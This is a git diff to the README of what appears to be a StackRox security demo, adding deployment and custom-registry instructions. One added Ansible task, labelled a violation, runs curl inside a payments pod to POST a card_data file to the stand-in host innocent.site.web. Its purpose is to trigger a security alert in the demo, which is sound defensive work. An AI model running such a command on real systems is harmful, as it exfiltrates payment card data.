diff --git a/README.md b/README.md
index 384ce45..4c98de7 100644
--- a/README.md
+++ b/README.md
@@ -1,5 +1,11 @@
 # Stackrox Demo
 
+## Deploy central
+
+TODO
+
+## Deploy demo
+
 Create secrets.yaml and review it.
 
 ```sh
@@ -20,6 +26,17 @@ echo -n > ansible/roles/ocp4_workload_stackrox_demo_apps/tasks/pre_workload.yml
 echo -n > ansible/roles/ocp4_workload_stackrox_demo_pipeline/tasks/pre_workload.yml
 ```
 
+Edit `roles/ocp4_workload_stackrox_demo_apps/tasks/deploy_demos.yml` and modify accordingly.
+
+```yaml
+- name: k8s_exec violation
+  kubernetes.core.k8s_exec:
+    namespace: payments
+    pod: "{{ r_processor_pod.resources[0].metadata.name }}"
+    command: 'curl -X POST --data-binary @/var/lib/processor/card_data http://innocent.site.web'
+    ignore_errors: yes
+```
+
 Deploy the demo.
 
 ```sh
@@ -29,3 +46,12 @@ export K8S_AUTH_KUBECONFIG="$KUBECONFIG"
 ansible-playbook install.yaml
 ```
 
+## With a custom registry
+
+```sh
+./mirror.sh
+oc apply -f icsp.yaml
+podman login registry.itix.xyz
+base64 -w0 ${XDG_RUNTIME_DIR}/containers/auth.json > /tmp/auth.b64
+echo "ocp4_workload_stackrox_demo_apps_pull_secret: $(cat /tmp/auth.b64)" >> ansible/group_vars/all/secrets.yaml
+```
diff --git a/ansible/agnosticd b/ansible/agnosticd
index 0479e02..1f4e260 160000
--- a/ansible/agnosticd
+++ b/ansible/agnosticd
@@ -1 +1 @@
-Subproject commit 0479e02b2c9a2e018e2543c9940c8279f3246e2d
+Subproject commit 1f4e26026d72ef0824358e2d4cdf8038b8549040